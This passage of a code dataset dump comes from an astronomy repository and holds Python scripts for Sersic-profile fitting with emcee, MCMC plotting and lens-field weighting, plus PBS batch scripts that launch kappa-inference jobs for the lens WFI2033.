425, "num_lines": 264, "path": "/python/modeling_utilities/fitting_test.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Tools for simulating a Seric profile, convolving it with the PSF, optimizing it and computing parameter uncertinties with emcee\n\nimport numpy as np\nimport time\n\nfrom astropy.io import fits\npixels = 100\n# create a blanck image\nimg = np.zeros([pixels,pixels])\nhdu = fits.PrimaryHDU(img)\nhdu.writeto('new.fits',clobber=True)\n\n# create a fits file with a Sersic\nfrom astropy.modeling.models import Sersic2D\nfrom astropy.convolution import convolve, convolve_fft, Gaussian2DKernel\nsers = Sersic2D(amplitude = 100, r_eff = 10, n=1, x_0=50, y_0=50, ellip=.5, theta=-1)\n# amplitude = Central surface brightness, within r_eff\nx,y = np.meshgrid(np.arange(pixels), np.arange(pixels))\nimg = sers(x,y)\nhdu = fits.PrimaryHDU(img)\nhdu.writeto('new.fits',clobber=True)\n\n# insert noise to the model\noriginalsky = 20\nnoise = np.random.poisson(img + originalsky)\nnoise_forsigma = np.random.poisson(img + originalsky) # I don't want to use the created noise as a noise estimate because that would produce an artificially low chi^2\nimg = noise - originalsky\nhdu = fits.PrimaryHDU(img)\nhdu.writeto('new_noise.fits',clobber=True)\n\n# fitting with sherpa a sersic profile convolved with the psf\nfrom astropy.modeling.models import Gaussian2D\ngauss = Gaussian2D(amplitude = 1, x_mean = 26, y_mean = 26, x_stddev=3, y_stddev=3)\nx_,y_ = np.meshgrid(np.arange(pixels/2.0+1), np.arange(pixels/2.0+1))\npsf = gauss(x_,y_)\nhdu = fits.PrimaryHDU(psf)\nhdu.writeto('new_psfsherpa.fits',clobber=True)\nimg = convolve(sers(x,y), gauss(x_,y_), normalize_kernel=True)\nnoise = np.random.poisson(img + originalsky)\nimg = noise - originalsky\nhdu = fits.PrimaryHDU(img)\nhdu.writeto('new_convnoise.fits',clobber=True)\nimport sherpa.astro.ui as ui\nui.load_data('new_convnoise.fits')\nui.load_psf(\"psf\",\"new_psfsherpa.fits\")\nui.set_psf(psf)\nui.set_source(ui.const2d.c + ui.sersic2d.g)\nc.c0 = 5\ng.xpos=45\ng.ypos=55\ng.ellip = .4\ng.theta=-1.5\ng.n = 1.5\ng.n.max=4\ng.ampl=90.\nui.thaw(g)\nui.thaw(c.c0)\nui.set_method(\"neldermead\")\nui.set_method_opt(\"iquad\",0)\nui.set_method_opt(\"finalsimplex\",0)\nui.fit()\n#ui.conf()\nsherpamodel = ui.get_model_image().y\nhdu = fits.PrimaryHDU(img - sherpamodel)\nhdu.writeto('new_residualsconvsherpa.fits',clobber=True)\n\n# optimize in scipy by minimizing the chi^2 on the grid, including the convolution\nstart_timeoptimize = time.time()\nimg = convolve(Sersic2D(amplitude = 100, r_eff = 10, n=1, x_0=50, y_0=50, ellip=.5, theta=-1)(x,y), gauss(x_,y_), normalize_kernel=True)\nnoise = np.random.poisson(img + originalsky)\nimg = noise - originalsky\nhdu = fits.PrimaryHDU(noise - originalsky)\nhdu.writeto('new_convnoise.fits',clobber=True)\ndef chi2(arg):\n amplitude,r_eff,n,x_0,y_0,ellip,theta = arg\n sersmodel = Sersic2D(amplitude, r_eff, n, x_0, y_0, ellip, theta)\n model = convolve(sersmodel(x,y), gauss(x_,y_), normalize_kernel=True)\n return np.sum((img - model)**2/noise_forsigma**2)\nfrom scipy.optimize import minimize\nprint \"Optimizing...\"\n#optimal = minimize(chi2, [90, 8, 1.5, 45, 55, .3, -1.2],method='Powell')\noptimal = minimize(chi2, [90, 8, 1.5, 45, 55, .3, -1.2],method='Nelder-Mead',options={'maxiter': 2000})\nhdu = fits.PrimaryHDU(img - convolve(Sersic2D(optimal.x[0],optimal.x[1],optimal.x[2],optimal.x[3],optimal.x[4],optimal.x[5],optimal.x[6])(x,y), gauss(x_,y_), normalize_kernel=True))\nhdu.writeto('new_residualsconv.fits',clobber=True)\nprint optimal\nprint \"Chi^2/nu\",np.sum((img - convolve(Sersic2D(optimal.x[0],optimal.x[1],optimal.x[2],optimal.x[3],optimal.x[4],optimal.x[5],optimal.x[6])(x,y), gauss(x_,y_), normalize_kernel=True) + originalsky)**2/noise_forsigma**2)/(pixels**2 - 7), \"nu =\", pixels**2 - 7\n # !!!!!!!!!!!!! careful what I did here, adding the sky level to match the noise level\nprint(\"Time for scipy optimization: --- %s seconds ---\" % (time.time() - start_timeoptimize))\n\n# emcee\n\nimport emcee\ntheta_true = (100, 10, 1, 50, 50, .5, -1)\n# priors I use:\n# amplitude [0,1000]\n# r_eff > 0; Gauss(10,10)\n# n (0.5,10]; Gauss(2,1)\n# x_0 Gauss(50,2)\n# y_0 Gauss(50,2)\n# ellip [0.2,1)\n# theta Gauss(-1,0.2)\ndef log_prior(arg):\n amplitude, r_eff, n, x_0, y_0, ellip, theta = arg\n if amplitude < 0 or amplitude > 1000 or r_eff <= 0 or n <= 0.5 or n > 10 or ellip < 0.2 or ellip >= 1:\n return -np.inf # log(0)\n return -0.5 * ((r_eff - 10)**2)/(10**2) -0.5 * ((n - 2)**2)/(0.5**2) -0.5 * ((x_0 - 50)**2)/(2**2) -0.5 * ((y_0 - 50)**2)/(2**2) -0.5 * ((ellip + 0.5)**2)/(0.15**2) -0.5 * ((theta + 1)**2)/(0.2**2)\ndef log_like(arg):\n amplitude, r_eff, n, x_0, y_0, ellip, theta = arg\n return -0.5 * chi2(arg)\ndef log_posterior(arg):\n if not np.isfinite(log_prior(arg)):\n return -np.inf\n return log_prior(arg) + log_like(arg)\nndim = 7 # number of parameters in the model\nnwalkers = 20 # number of MCMC walkers\nnsteps = 2000 # number of MCMC steps to take including burn-in\n# initial guesses in a small ball around the best-fit\nstarting_guesses = np.c_[abs(np.random.normal(optimal.x[0],10,nwalkers)),abs(np.random.normal(optimal.x[1],2,nwalkers)),abs(np.random.normal(optimal.x[2],0.1,nwalkers)),abs(np.random.normal(optimal.x[3],2,nwalkers)),abs(np.random.normal(optimal.x[4],2,nwalkers)),abs(np.random.normal(optimal.x[5],0.1,nwalkers)),np.random.normal(optimal.x[6],0.1,nwalkers)] # use this in case I want to run emcee instead of parallel tempering\n\nprint(\"Running MCMC...\")\n#start_timeemcee1 = time.time()\n#sampler = emcee.EnsembleSampler(nwalkers,ndim,log_posterior)\n# run while showing the progress\n#for i, result in enumerate(sampler.sample(starting_guesses,iterations=nsteps)): # fails unless I keep the keyword *iterations*\n #if (i+1) % 100 == 0:\n #print(\"{0:5.1%}\".format(float(i) / nsteps))\n#print(\"Time for emcee with 1 thread: --- %s seconds ---\" % (time.time() - start_timeemcee1))\n\nstart_timeemcee8 = time.time()\nsampler = emcee.EnsembleSampler(nwalkers,ndim,log_posterior,threads = 7)\n# run while showing the progress\nfor i, result in enumerate(sampler.sample(starting_guesses,iterations=nsteps)): # fails unless I keep the keyword *iterations*\n if (i+1) % 100 == 0:\n print(\"{0:5.1%}\".format(float(i) / nsteps))\nprint(\"Time for emcee with 7 threads: --- %s seconds ---\" % (time.time() - start_timeemcee8))\n\n# plot the time laps\nimport corner\nimport pylab as plt\nfrom matplotlib.ticker import MaxNLocator\nplt.clf()\nfig, axes = plt.subplots(7, 1, sharex=True, figsize=(8, 9))\naxes[0].plot(sampler.chain[:, :, 0].T, color=\"k\", alpha=0.4)\naxes[0].yaxis.set_major_locator(MaxNLocator(5))\naxes[0].axhline(theta_true[0], color=\"#888888\", lw=2)\naxes[0].set_ylabel(\"amplitude\")\naxes[1].plot(sampler.chain[:, :, 1].T, color=\"k\", alpha=0.4)\naxes[1].yaxis.set_major_locator(MaxNLocator(5))\naxes[1].axhline(theta_true[1], color=\"#888888\", lw=2)\naxes[1].set_ylabel(\"r_eff\")\naxes[2].plot(sampler.chain[:, :, 2].T, color=\"k\", alpha=0.4)\naxes[2].yaxis.set_major_locator(MaxNLocator(5))\naxes[2].axhline(theta_true[2], color=\"#888888\", lw=2)\naxes[2].set_ylabel(\"n\")\naxes[3].plot(sampler.chain[:, :, 3].T, color=\"k\", alpha=0.4)\naxes[3].yaxis.set_major_locator(MaxNLocator(5))\naxes[3].axhline(theta_true[3], color=\"#888888\", lw=2)\naxes[3].set_ylabel(\"x_0\")\naxes[4].plot(sampler.chain[:, :, 4].T, color=\"k\", alpha=0.4)\naxes[4].yaxis.set_major_locator(MaxNLocator(5))\naxes[4].axhline(theta_true[4], color=\"#888888\", lw=2)\naxes[4].set_ylabel(\"y_0\")\naxes[5].plot(sampler.chain[:, :, 5].T, color=\"k\", alpha=0.4)\naxes[5].yaxis.set_major_locator(MaxNLocator(5))\naxes[5].axhline(theta_true[5], color=\"#888888\", lw=2)\naxes[5].set_ylabel(\"ellip\")\naxes[6].plot(sampler.chain[:, :, 6].T, color=\"k\", alpha=0.4)\naxes[6].yaxis.set_major_locator(MaxNLocator(5))\naxes[6].axhline(theta_true[6], color=\"#888888\", lw=2)\naxes[6].set_ylabel(\"theta\")\naxes[2].set_xlabel(\"step number\")\nfig.tight_layout(h_pad=0.0)\nfig.show()\n\n# print diagnostics and do corner plot\nnburn = 1000 # \"burn-in\" to stabilize chains\nsamples = sampler.chain[:, nburn:, :].reshape((-1, ndim)) # combines all walkers, without burn-in\n#alpha_samp = sampler.flatchain.T[0]\n#beta_samp = sampler.flatchain.T[1]\n#sigma_samp = sampler.flatchain.T[2]\n#print(\"Autocorrelation time:\", sampler.get_autocorr_time())\nprint \"acceptance fraction: \", np.median(sampler.acceptance_fraction)\nprint \"median, std 1: \", np.median(samples[:,0]), np.std(samples[:,0])\nprint \"median, std 2: \", np.median(samples[:,1]), np.std(samples[:,1])\nprint \"median, std 3: \", np.median(samples[:,2]), np.std(samples[:,2])\nprint \"median, std 4: \", np.median(samples[:,3]), np.std(samples[:,3])\nprint \"median, std 5: \", np.median(samples[:,4]), np.std(samples[:,4])\nprint \"median, std 6: \", np.median(samples[:,5]), np.std(samples[:,5])\nprint \"median, std 7: \", np.median(samples[:,6]), np.std(samples[:,6])\nfig = corner.corner(samples, labels=[\"amplitude\", \"r_eff\", \"n\", \"x_0\", \"y_0\", \"ellip\", \"theta\"],truths=[theta_true[0],theta_true[1],theta_true[2],theta_true[3],theta_true[4],theta_true[5],theta_true[6]])\nfig.show()\n\n# parallel tempering; takes longer to run because it runs emcee for each temperature\nstart_timept = time.time()\nntemps = 5\nstarting_guesses = np.zeros((ntemps,nwalkers,ndim))\nfor i in range(ntemps):\n starting_guesses[i] = np.c_[abs(np.random.normal(optimal.x[0],10,nwalkers)),abs(np.random.normal(optimal.x[1],2,nwalkers)),abs(np.random.normal(optimal.x[2],0.1,nwalkers)),abs(np.random.normal(optimal.x[3],2,nwalkers)),abs(np.random.normal(optimal.x[4],2,nwalkers)),abs(np.random.normal(optimal.x[5],0.1,nwalkers)),np.random.normal(optimal.x[6],0.1,nwalkers)]\nfrom emcee import PTSampler\nsampler = PTSampler(ntemps,nwalkers,ndim,log_like,log_prior,threads = 7)\nprint(\"Running MCMC...\")\nfor i, result in enumerate(sampler.sample(starting_guesses,iterations=nsteps)): # fails unless I keep the keyword *iterations*\n if (i+1) % 100 == 0:\n print(\"{0:5.1%}\".format(float(i) / nsteps))\nprint(\"Time for PT with 7 threads: --- %s seconds ---\" % (time.time() - start_timept))\nprint \"Evidence: \", sampler.thermodynamic_integration_log_evidence()\n# plot the time laps\nplt.clf()\nfig, axes = plt.subplots(7, 1, sharex=True, figsize=(8, 9))\naxes[0].plot(sampler.chain[:, :, :, 0].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[0].yaxis.set_major_locator(MaxNLocator(5))\naxes[0].axhline(theta_true[0], color=\"#888888\", lw=2)\naxes[0].set_ylabel(\"amplitude\")\naxes[1].plot(sampler.chain[:, :, :, 1].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[1].yaxis.set_major_locator(MaxNLocator(5))\naxes[1].axhline(theta_true[1], color=\"#888888\", lw=2)\naxes[1].set_ylabel(\"r_eff\")\naxes[2].plot(sampler.chain[:, :, :, 2].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[2].yaxis.set_major_locator(MaxNLocator(5))\naxes[2].axhline(theta_true[2], color=\"#888888\", lw=2)\naxes[2].set_ylabel(\"n\")\naxes[3].plot(sampler.chain[:, :, :, 3].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[3].yaxis.set_major_locator(MaxNLocator(5))\naxes[3].axhline(theta_true[3], color=\"#888888\", lw=2)\naxes[3].set_ylabel(\"x_0\")\naxes[4].plot(sampler.chain[:, :, :, 4].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[4].yaxis.set_major_locator(MaxNLocator(5))\naxes[4].axhline(theta_true[4], color=\"#888888\", lw=2)\naxes[4].set_ylabel(\"y_0\")\naxes[5].plot(sampler.chain[:, :, :, 5].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[5].yaxis.set_major_locator(MaxNLocator(5))\naxes[5].axhline(theta_true[5], color=\"#888888\", lw=2)\naxes[5].set_ylabel(\"ellip\")\naxes[6].plot(sampler.chain[:, :, :, 6].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[6].yaxis.set_major_locator(MaxNLocator(5))\naxes[6].axhline(theta_true[6], color=\"#888888\", lw=2)\naxes[6].set_ylabel(\"theta\")\naxes[2].set_xlabel(\"step number\")\nfig.tight_layout(h_pad=0.0)\nfig.show()\nplt.clf()\nsamples = sampler.chain[:, :, nburn:, :].reshape((-1, ndim)) # combines all walkers, without burn-in\nfig = corner.corner(samples, labels=[\"amplitude\", \"r_eff\", \"n\", \"x_0\", \"y_0\", \"ellip\", \"theta\"],truths=[theta_true[0],theta_true[1],theta_true[2],theta_true[3],theta_true[4],theta_true[5],theta_true[6]])\nfig.show()\nemcee.autocorr.integrated_time(samples,axis=0)\nemcee.autocorr.function(samples,axis=0)\n\n#Time for scipy optimization: --- 52.5281159878 seconds ---\n#Time for emcee with 1 thread: --- 323.612744093 seconds ---\n#Time for emcee with 4 threads: --- 132.817188978 seconds ---\n#Time for emcee with 7 threads: --- 118.459464073 seconds ---\n#Time for PT with 7 threads: --- 452.805958033 seconds ---\n\n# FUTURE WORKS\n'''\n1) save progress, run on multiple computers\n1) PT and emcee give different distributions even after setting more stringent prior on ellipticity\n1) why does it say AutocorrError: The chain is too short to reliably estimate the autocorrelation time ?\n1) careful because right now all images with noise have integer pixel values\n1) convolution central pixels: http://docs.astropy.org/en/stable/api/astropy.convolution.discretize_model.html#astropy.convolution.discretize_model oversample for sub-pixel; pyprofit seems the better option\n3) make physical units: exptime, gain, scale, mag\n4) lens it\n5) mask central pixels\n'''\n" }, { "alpha_fraction": 0.6651685237884521, "alphanum_fraction": 0.7640449404716492, "avg_line_length": 23.72222137451172, "blob_id": "86404e70bd846169fb6652f28d95821f9e8834af", "content_id": "41175c07ce45b383066d33aa8ac155ca977bdba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 445, "license_type": "no_license", "max_line_length": 101, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer12.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log12.out\n#PBS -e Log12.err\n#PBS -N 12\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2226.py WFI2033 5 45 23 meds gal gamma oneoverr mass2rms\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal gamma oneoverr mass2rms\n" }, { "alpha_fraction": 0.6626794338226318, "alphanum_fraction": 0.7535884976387024, "avg_line_length": 22.22222137451172, "blob_id": "79e4882121dd6dc62e221d777191fb40b3974610", "content_id": "8a3b66cb84e837ed150227fb4938720407aa466f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 418, "license_type": "no_license", "max_line_length": 93, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer35.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log35.out\n#PBS -e Log35.err\n#PBS -N 35\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2226.py WFI2033 5 45 23 meds gal oneoverr SIShalo\npython inferkappa_unbiasedwithshear.py WFI2033 5 120 23 meds gal oneoverr SIShalo\n" }, { "alpha_fraction": 0.6802763938903809, "alphanum_fraction": 0.7072864174842834, "avg_line_length": 33.60869598388672, "blob_id": "5d64773e15cb6326ac244a4b347c0b56c688d3bb", "content_id": "e83e7aa7aee8f773b133e4395294a3e42a6cc5e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1592, "license_type": "no_license", "max_line_length": 100, "num_lines": 46, "path": "/python/plot_utilities/mcmcplots.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Creates both time laps and corner plots for MCMC output files in the format of glafic and hostlens\n# Use as python mcmcplots.py filename\n\nimport numpy as np\nimport sys\n\nfile = str(sys.argv[1])\nfiletime = file[:-4] + \"_timelapse.png\"\nfilecorner = file[:-4] + \"_cornerplot.png\"\n\nburnin = 10 # in percent, to eliminate from the head\ndata = np.loadtxt(file,unpack=True)\ndata = data[0:len(data),int(burnin/100.0*len(data[0])):len(data[0])]\n\nimport corner\nimport pylab as plt\nfrom matplotlib.ticker import MaxNLocator\n\n# plot timelapse\nplt.clf()\nfig, axes = plt.subplots(len(data), 1, sharex=True, figsize=(20, 20))\nfor i in range(len(data)):\n axes[i].plot(data[i], color=\"k\", alpha=0.4)\n axes[i].yaxis.set_major_locator(MaxNLocator(5))\n #axes[0].axhline(chimin_z, color=\"#888888\", lw=2)\n axes[i].set_ylabel(str(i))\naxes[i].set_xlabel(\"step number\")\nfig.tight_layout(h_pad=0.0)\n#fig.show()\nfig.savefig(filetime, dpi=150)\n\n# corner plot\n#nburn = nsteps/2 # \"burn-in\" to stabilize chains\n#samples = sampler.chain[:, nburn:, :].reshape((-1, ndim)) # combines all walkers, without burn-in\n#alpha_samp = sampler.flatchain.T[0]\n#beta_samp = sampler.flatchain.T[1]\n#sigma_samp = sampler.flatchain.T[2]\n#print(\"Autocorrelation time:\", sampler.get_autocorr_time())\n#print \"acceptance fraction: \", np.median(sampler.acceptance_fraction)\nlabels = np.linspace(0,len(data)-1,len(data)).astype(int).astype(str)\nmeds = np.zeros(len(data))\nfor i in range(len(data)):\n meds[i] = np.median(data[i])\nfig = corner.corner(data.T, labels=labels,truths=meds)\n#fig.show()\nfig.savefig(filecorner, dpi=150)\n" }, { "alpha_fraction": 0.6496945023536682, "alphanum_fraction": 0.7576375007629395, "avg_line_length": 23.549999237060547, "blob_id": "eb1ee2b4a00d0c682488516742719b63dc3138c0", "content_id": "655d6673b77287198badf176c8d563f036d424f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 491, "license_type": "no_license", "max_line_length": 63, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim36.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log36s.out\n#PBS -e Log36s.err\n#PBS -N 36s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma\n" }, { "alpha_fraction": 0.5048640370368958, "alphanum_fraction": 0.534527063369751, "avg_line_length": 93.69808959960938, "blob_id": "4090365f5a30922433264f3628fdd66638f11937", "content_id": "9ff48d7c6fa0e071352eaddca3aa12216133c497", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79358, "license_type": "no_license", "max_line_length": 716, "num_lines": 838, "path": "/python/weightinguniversal.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# run as: python weightinguniversal.py lens fields#.lst masks#.lst samplesize# msk_lenssize maglimit classification mode\n# where lens is B1608,HE0435,HE1104 or RX1131, samplesize number is 0, 100 or 1000 and msk_lenssize is 45, 60, 90 or 120; maglimit is 23 23.5 or 24; classification is \"old\" or \"new\", where \"old\" means original CFHTLENS, and \"new\" means extended beyond i=23;\n\nimport numpy as np\nimport scipy\nimport sys\nfrom scipy import special\nfrom scipy import stats\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\n\n# Open the list of fields and associated masks; open the final HE_lens mask, with correct header; open the catalogue, define coordinates and redshift\n\nstart_timefield = time.time()\n\nwith open(sys.argv[2]) as f: # fields#.lst\n listfields = f.readlines()\n\nwith open(sys.argv[3]) as f: # masks#.lst\n listmasks = f.readlines()\n\nprint(\"Arguments: \\n Lens field: %s \\n List of fields to work on: %s \\n List of masks associated with the fields: %s \\n Number of samples to be drawn from P(z) and P(Mstar): %s \\n Radius of each cell: %s \\n Limiting magnitude: %s \\n Classification: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5]), float(str(sys.argv[6])), str(sys.argv[7])))\n\nmsk_lens = fits.open('msk%s_asecrad%s.fits' % (str(sys.argv[1]),str(sys.argv[5])))\nmaskedlens = np.where( msk_lens[0].data == 0 ) # will be used later in computing the mask cover fraction\n#print maskedlens[0]\n#print maskedlens[1]\ncat_lens = Table.read('%s.cat' % (str(sys.argv[1])), names=('ID', 'X', 'Y', 'ra','dec','mag','z','z_inf','z_sup','mass_best','mass_inf','mass_med','mass_sup', 'specz?', 'correction'), format='ascii')\npdzcat_lens = np.loadtxt('%s_pdz.cat' % str(sys.argv[1])) # since the catalogue is small, I just load it into memory\nmstarcat_lens = np.loadtxt('%s_mstar.cat' % str(sys.argv[1])) # since the catalogue is small, I just load it into memory\nzgrid=np.linspace(0.05,3.5,70)\nzgridint = np.arange(70) # because stats.rv_discrete only works with integer points\nif str(sys.argv[7])==\"old\":\n cat_lens_reclassif=cat_lens\nelse:\n cat_lens_reclassif=Table(names=('ID','X','Y','ra','dec','mag','z','z_inf','z_sup','mass_best','mass_inf','mass_med','mass_sup','specz?','correction'),dtype=('<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8'))\n for i in range(len(cat_lens)):\n if cat_lens['mag'][i]<=23:\n cat_lens_reclassif.add_row(cat_lens[i])\n else:\n if cat_lens['specz?'][i]==1:\n cat_lens_reclassif.add_row(cat_lens[i])\n elif mstarcat_lens[mstarcat_lens[:,0]==cat_lens['ID'][i]][0][5]/mstarcat_lens[mstarcat_lens[:,0]==cat_lens['ID'][i]][0][6]<0.5:\n cat_lens_reclassif.add_row(cat_lens[i])\n#print cat_lens_reclassif['ID']\ndist_lens = Column(np.arange(len(cat_lens_reclassif)), name='dist', dtype=('<f8')) # this is done in order to implement the 1/r weight convention for < 10 arcsec and also in order to use the mask of appropriate radius\ncat_lens_reclassif.add_column(dist_lens)\nif str(sys.argv[1]) == \"B1608\":\n center_lens = SkyCoord('16:09:13.956 +65:32:28.00', frame='fk5', unit=(u.hourangle, u.deg))\nif str(sys.argv[1]) == \"HE0435\":\n center_lens = SkyCoord('04:38:14.871 -12:17:14.96', frame='fk5', unit=(u.hourangle, u.deg))\nif str(sys.argv[1]) == \"HE1104\":\n center_lens = SkyCoord('11:06:33.450 -18:21:24.20', frame='fk5', unit=(u.hourangle, u.deg))\nif str(sys.argv[1]) == \"RX1131\":\n center_lens = SkyCoord('11:31:51.435 -12:31:58.24', frame='fk5', unit=(u.hourangle, u.deg))\n\ncoord_lens=SkyCoord(ra=cat_lens_reclassif['ra']*u.degree, dec=cat_lens_reclassif['dec']*u.degree, frame='fk5')\ncat_lens_reclassif['dist'] = coord_lens.separation(center_lens).arcsec\nfor i in range(len(cat_lens_reclassif)):\n if cat_lens_reclassif['dist'][i] < 10:\n cat_lens_reclassif['dist'][i] = 10\n\nif str(sys.argv[1]) == \"B1608\":\n z_s_lens = 1.39\nif str(sys.argv[1]) == \"HE0435\":\n z_s_lens = 1.69\nif str(sys.argv[1]) == \"HE1104\":\n z_s_lens = 2.32\nif str(sys.argv[1]) == \"RX1131\":\n z_s_lens = 0.66\npixlens = 0.200 * u.arcsec\n\n# Open the subfield mask and catalogue, and set up the cell grid\n\npixCFHT = 0.187 * u.arcsec\n\nfor count in range(len(listfields)):\n #if \"W1m\" in [x[0:len(listmasks[0])] for x in listmasks][count]:\n \n start_timesubfield = time.time()\n msk = fits.open('%s' % [a[0:len(listmasks[0])-1] for a in listmasks][count])\n cells_on_a_side = int((len(msk[0].data[1]) * pixCFHT) / (1200 * pixlens))\n #print (\"Reading catalogue %s.cat ...\" %[x[0:len(listfields[0])-1] for x in listfields][count])\n #start_time = time.time()\n #catfield = Table.read('%s.cat' % [x[0:len(listfields[0])-1] for x in listfields][count], format='ascii')\n #print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n# Define the center of each cell as a matrix of SkyCoord and test which cells to discard because of large masked area (I ignore the area covered in the lens)\n# Mask the lens catalogue using the field mask of each cell\n\n worldfield = WCS('%s' % [b[0:len(listmasks[0])-1] for b in listmasks][count])\n coordorigin = SkyCoord(ra=worldfield.wcs_pix2world(0,0,0)[0]*u.degree, dec=worldfield.wcs_pix2world(0,0,0)[1]*u.degree, frame='fk5')\n centerfields = [ [SkyCoord('00:0:0.0 0:0:0.0', frame='fk5', unit=(u.hourangle, u.deg))]*cells_on_a_side for i in range(cells_on_a_side) ] # matrix of SkyCoord\n maskedcell = np.zeros((cells_on_a_side,cells_on_a_side))\n origtry = np.zeros((cells_on_a_side,cells_on_a_side))\n origtry1 = np.zeros((cells_on_a_side,cells_on_a_side))\n catupdate_lens = [[ [Table(names=('ID','X','Y','ra','dec','mag','z','z_inf','z_sup','mass_best','mass_inf','mass_med','mass_sup','specz?','correction','dist'),dtype=('<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8'))]*cells_on_a_side for i in range(cells_on_a_side) ] for j in range(cells_on_a_side)] # matrix of tables; this is threedimensional because if I create a two dimensional array it will append to all columns\n print \"Masking the lens catalogue...\"\n start_time = time.time()\n for i in range(cells_on_a_side):\n for j in range(cells_on_a_side):\n xlow = (240.0 * u.arcsec / pixCFHT) * i\n xhigh = (240.0 * u.arcsec / pixCFHT) + (240.0 * u.arcsec / pixCFHT) * i\n ylow = (240.0 * u.arcsec / pixCFHT) * j\n yhigh = (240.0 * u.arcsec / pixCFHT) + (240.0 * u.arcsec / pixCFHT) * j\n centerfields[i][j] = SkyCoord(ra=worldfield.wcs_pix2world(xlow + (xhigh-xlow)/2, ylow + (yhigh-ylow)/2, 0)[0]*u.degree, dec=worldfield.wcs_pix2world(xlow + (xhigh-xlow)/2, ylow + (yhigh-ylow)/2,0)[1]*u.degree, frame='fk5')\n maskedfieldx = float(xlow)+(maskedlens[0]/1200.0)*(float(xhigh)-float(xlow))\n maskedfieldy = float(ylow)+(maskedlens[1]/1200.0)*(float(yhigh)-float(ylow))\n # the pixels in the field mask that correspond to the unmasked pixels in the lens mask\n maskedfield = msk[0].data[maskedfieldy.astype(int),maskedfieldx.astype(int)]\n maskedcell[i][j] = maskedfield[maskedfield == 0].size / (np.pi*((int((str(sys.argv[5])))*u.arcsec/pixlens)**2))\n #print i,j\n for k in range(len(cat_lens_reclassif)):\n if (msk_lens[0].data[cat_lens_reclassif['Y'][k],cat_lens_reclassif['X'][k]] == 0) and (cat_lens_reclassif['z'][k] <= z_s_lens) and (cat_lens_reclassif['mag'][k] <= float(str(sys.argv[6]))) and (msk[0].data[(ylow + cat_lens_reclassif['Y'][k] * pixlens / pixCFHT).value, (xlow + cat_lens_reclassif['X'][k] * pixlens / pixCFHT).value] == 0):\n #print i,j,k,len(cat_lens_reclassif),cat_lens[k]\n catupdate_lens[i][j][0].add_row(cat_lens_reclassif[k])\n # the first condition is necessary because, the way the code is written now, the lens field mask is not used to actually mask the catalogue\n\n #print catupdate_lens[5][10][0]['dist']\n #print i,j\n #print xlow,xhigh,ylow,yhigh\n #print msk[0].data[xlow : xhigh, ylow : yhigh].size\n\n#print centerfields\n #print maskedcell\n msk.close()\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n print \"Computing lens weights...\"\n start_time = time.time()\n\n# Compute the weights for the lens\n# I'm interested in using the probability distribution (PSF) for the z and Mstar of each object; First, I use the most probable values, then I sample from the (symplified) PDFs\n\n #if str(sys.argv[8]) == \"orig\":\n gal_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n zweight_lensorig = 